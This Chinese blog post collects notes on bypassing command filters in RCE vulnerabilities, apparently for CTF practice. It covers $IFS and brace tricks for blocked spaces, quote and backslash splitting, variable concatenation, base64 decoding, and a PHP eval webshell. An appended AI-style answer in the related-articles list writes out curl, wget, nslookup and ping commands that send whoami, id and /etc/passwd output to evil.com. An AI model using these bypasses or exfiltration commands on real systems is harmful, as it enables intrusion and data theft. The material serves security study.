RCE漏洞之绕过

最新推荐文章于 2025-03-30 00:47:44 发布
最新推荐文章于 2025-03-30 00:47:44 发布
阅读量6.2k 收藏 61
点赞数 11
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/loseheart157/article/details/109305380
版权

文章目录

花括号

{}
在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令
{cat,flag}

斜杠

路径 /
\是在正则等语法里面,表示后面跟的字符是正常字符,不需要转义。
也就意味着,我们可以在rce漏洞,过滤掉cat ls等命令时候,直接使用ca\t来实现绕过

空格过滤

< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等

一些命令分隔符

linux中:%0a(回车) 、%0d(换行) 、; 、& 、| 、&&、||
windows中:%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符)

黑名单绕过

拼接绕过

比如:a=l;b=s;$a$b
利用偶读拼接方法绕过黑名单:a=fl;b=ag;cat $a$b
利用.拼接绕过(sy.(st).em)
使用内敛执行代替system

echo `ls`;
echo $(ls);
?><?=`ls`;
?><?=$(ls);
<?=`ls /`;?>      # 等效于<?php echo `ls /`; ?>

编码绕过

[root~]# echo 'Y2F0wqAK' | base64 -d 1.txt
-d是解码,是base64解码
xxd - r -p可以转换16进制,同样用户管道符之后。

单引号和双引号绕过

比如:ca‘‘t flag 或ca""t flag

利用Shell 特殊变量绕过

例如,第一个参数是1,第二个参数是2。而参数不存在时其值为空。
$@表示
比如:ca$@t fla$@g或者ca$1t fla$2g

linux中直接查看文件内容的工具

cat、tac、more、less、head、tail、nl、sed、sort、uniq

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容

(假设该目录下有index.php和flag.php)

cat `ls`

等同于–>

cat flag.php;cat index.php

文件构造

在ctfhub文件包含中,有一个shell,txt,也就是文件
我们令?file = shell.txt,已知shell.txt内容为

<?php eval($_REQUEST['ctfhub']);?>

wrequest类型是由get和post构成的
在post数据里输入
ctfhub=system("ls /");
就可以执行命令.

RCE远程命令/代码执行漏洞绕过
G3et的博客
01-01 1162
(1)RCE主要是执行了危险的函数(3)常见的绕过:空格过滤、命令分隔符、编码绕过、Hex编码绕过、Oct编码绕过、变量绕过、反斜杠绕过、偶读拼接绕过关键字过滤等 (4)熟悉掌握php中远程命令/代码执行的相关函数以及绕过和原理参考文档:远程命令/代码执行漏洞RCE)总结RCE远程命令执行绕过初学RCE(远程命令/代码执行漏洞
【网络安全】RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 3151
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
RCE绕过的简介以及常见的绕过方式(个人学习笔记)
2302_80935968的博客
03-28 1363
1.目录分隔符被过滤后,无法通过cat等查看目录的命令直接读取文件夹的目录里的PHP文件,而是需要先进入该文件夹(查看文件夹目录),再通过cat读取PHP文件的内容。进入题目,查看源代码,为php函数,该函数意思为:判断是否有变量cmd,如果有,则执行eval($_REQUEST[‘cmd’]);查看网页信息,该题对注入的命令无任何过滤,且当输入ip的时候,cmd会执行ping命令,尝试ping 127.0.0.1 | ls ,可以正常连接。命令 system():执行系统命令并输出执行结果。
WEB安全--RCE--RCE绕过
m0_74800552的博客
03-30 1151
回调函数(Callback Function)指的是将或作为参数传递给另一个函数,从而在特定条件下调用该函数。
RCE漏洞详解及绕过总结(全面)
热门推荐
永不落的梦想
07-10 2万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
Fastjson RCE漏洞绕过
qingfeng2556的博客
08-01 539
https://blog.csdn.net/systemino/article/details/96352087 利用JSON反序列话过程中,潜在的loadClass分析,尝试不同的类,寻找出来的一些代码
RCE漏洞总结及绕过---系统命令执行篇
qq_46603839的博客
04-23 5881
对于取反绕过~ 、参数逃逸等绕过方法放在了 代码执行漏洞篇中RCE漏洞防护1.对用户的输入作严格的过滤,建议使用白名单策略;2.尽量不使用容易产生漏洞的危险函数;
RCE漏洞
weixin_46962006的博客
12-13 7722
                       RCE(远程代码/命令执行)漏洞 目录前言简介 前言        个人观点,若有误请指教 简介 RCE(Remote Code/Command Execute)为远程代码/命令执行的漏洞 漏洞产生的原因:在Web应用中开发者为了灵活性,简洁性等会让应用去调用代码或者系统命令执行函数去处理。同时没有考虑用户是否可以控制这些函数的参数问题(若不能控制这些参数,自然也没有这个漏洞;若能控制这些参数,也可能出现考虑了但没有完全防住或者压根没考虑 ????),以至
【无标题】XXL-JOB默认accessToken身份绕过RCE漏洞
fmjnb的博客
10-09 702
XXL-JOB 是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。XXL-JOB 默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,从而获取服务器权限。经分析和研判,该漏洞利用难度低,可导致远程代码执行。步骤二:开启代理并打开BP对其首页进行抓包拦截....修改请求包内容。每次发送可以把jobId值改一下。
【网络安全】-rce漏洞-pikachu
weixin_65311462的博客
09-12 1987
由于应用程序在处理用户输入时未能正确验证、过滤或限制输入数据,导致hacker能通过网络在目标系统上执行任意代码或命令,从而完全控制受影响的系统。RCE漏洞是一种严重的安全漏洞类型,对系统安全构成重大威胁。
RCE(远程命令执行)绕过总结
Elite的博客
04-18 5425
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
RCE漏洞绕过
BKN711的博客
08-11 1075
RCE漏洞:远程代码执行和远程命令执行在很多Web应用中,开发人员会使用一些特殊函数,这些函数以一些字符串作为输入,功能是将输入的字符串当作代码或者命令来进行执行。当用户可以控制这些函数的输入时,就产生了RCE漏洞
RCE通配符绕过
m0_56059226的博客
08-27 1061
RCE的时候除了异或取反等方法,才学了一种新的绕过姿势,就是通配符 在这之前可以先看看什么是通配符Linux通配符的使用_Linux教程_Linux公社-Linux系统门户网站 (linuxidc.com) 谈谈CTF中常见情况吧,当字母数字或者一些特殊的字符被过滤掉时,不能直接传入,就可以考虑用通配符进行绕过,先看一张图片 ?代表的是匹配一个字符,这样的话他就会匹配所有成立情况对/home/kali/ex11进行操作,自然也包括了/bin/cat /home/kali/ex11,因为cat等一.
RCE漏洞总结及绕过---代码执行篇
qq_46603839的博客
04-30 2391
eval():该函数把字符串当做php代码来计算,并且字符串必须是合法的php代码,要以分号结尾;assert():该函数会检查一个指定断言。断言是一个逻辑学词汇,主要用于程序员来进行假设判断。断言只有两种类型,字符串型或者布尔型,当断言为flse时返回字符串表达式。如果断言是字符串那么会当做php代码执行;preg_replace():/e模式 正则匹配替换字符串,7.0版本后/e已经移除了;
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 1万+
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
ctf中常见php rce绕过总结
2302_76827504的博客
04-28 2459
只是总结一些常见的姿势,大佬轻喷。
总结rce(远程代码执行各种sao姿势)绕过bypass
A10ng_的博客
07-17 1万+
空格绕过: 在bash下可以用$IFS、${IFS}、$IFS$9、%09、<、>、<>、{,}(例如{cat,/etc/passwd} )、%20(space)、%09(tab),这儿跟sql注入有点相似,用/**/注释也能绕过。 命令执行函数system()绕过(在URL请求中过滤system()函数) 系统命令函数system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() 反..
RCE绕过之关键词绕过
Ciyaso的博客
07-23 1786
过滤cat,flag等关键词 ①代替 more:一页一页的显示档案内容 less:与 more 类似 head:查看头几行 tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示 tail:查看尾几行 nl:显示的时候,顺便输出行号 od:以二进制的方式读取档案内容 vi:一种编辑器,可以查看 vim:一种编辑器,可以查看 sort:可以查看 uniq:可以查看 file -f:报错出具体内容 sh /flag 2>%261 //报错出文件内容 ②使用转义符 ca\t /fl\ag
rce无回显绕过
最新发布
04-03
<think>好的,用户需要了解RCE无回显情况下的绕过技巧和实现方式。首先,我得回忆一下常见的无回显RCE利用方法。通常,当命令执行没有直接输出时,可以通过外带数据或者利用其他协议进行检测。 第一步,可能需要提到DNS外带。比如使用curl或nslookup将数据通过DNS查询发送到攻击者控制的服务器。这种方法常用于检测是否存在漏洞,因为很多环境允许DNS流量[^1]。 接下来,考虑HTTP请求外带。即使命令执行没有回显,也可以通过wget或curl触发HTTP请求到攻击者的服务器,从而确认漏洞存在。例如,执行命令访问特定URL,然后在服务器日志查看请求记录[^2]。 然后是时间延迟技术。通过执行sleep等命令,观察响应时间的变化来判断命令是否执行。比如,注入sleep 5,如果响应延迟了5秒,说明可能成功执行。 另外,还可以利用写入文件再读取的方法。比如将命令结果输出到web目录下的文件,然后通过访问该文件获取结果。不过这种方法需要web服务器有写权限,并且知道文件路径。 还有可能需要考虑其他协议如ICMP或者SMTP来外传数据。比如使用ping命令携带数据,但这种方法传输的数据量有限,且可能被防火墙拦截。 用户可能需要具体的实现示例,比如如何构造DNS外带的payload,或者如何利用Burp Collaborator进行检测。需要确保提到的技巧都有实际应用场景,并且引用相关资源。 最后,生成相关问题时要覆盖检测方法、工具使用、协议利用和防御措施等方面,帮助用户全面了解。</think>### RCE无回显绕过技巧及实现方式 在远程代码执行(RCE漏洞利用中,无回显场景需要通过间接方式确认命令执行结果,主要技术手段包括: #### 一、外带数据检测法 1. **DNS外带** 通过构造DNS查询请求将数据发送至攻击者控制的DNS服务器: ```bash curl http://evil.com/$(whoami).example.com nslookup $(id | base64).evil.com ``` 使用Burp Collaborator或Interactsh工具可自动捕获DNS查询记录[^3]。 2. **HTTP请求外带** 利用wget/curl触发HTTP请求: ```bash wget http://evil.com/?data=$(ls / | base64) ``` 通过HTTP请求头、URL参数或POST请求体传递数据,可使用OOB-Server实时接收数据。 #### 二、间接验证法 1. **时间盲注** 通过响应延迟判断命令执行结果: ```bash ping -c 5 127.0.0.1 && sleep 10 # 存在条件判断时使用 ``` 若目标系统支持管道符,可构造: ```bash cat /etc/passwd | base64 | curl -X POST --data-binary @- http://evil.com ``` 2. **文件写入+访问** 将执行结果写入Web目录: ```bash id > /var/www/html/result.txt ``` 通过浏览器访问`http://target.com/result.txt`读取结果(需已知Web路径和写权限)。 #### 三、特殊协议利用 1. **ICMP外带数据** 使用ping命令携带Base64编码数据(需自定义编码脚本): ```bash ping -p $(echo 'data' | xxd -p) evil.com ``` 2. **SMTP邮件发送** 通过mailutils发送命令结果: ```bash echo "结果" | mail -s "RCE数据" attacker@evil.com ``` #### 四、工具化实现 - **Curl加密传输** ```bash curl --data "$(ls -al | openssl aes-256-cbc -pass pass:key)" https://evil.com ``` - **Metasploit模块** 使用`exploit/multi/handler`配合`cmd/unix/reverse_bash`实现反向Shell[^4]。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值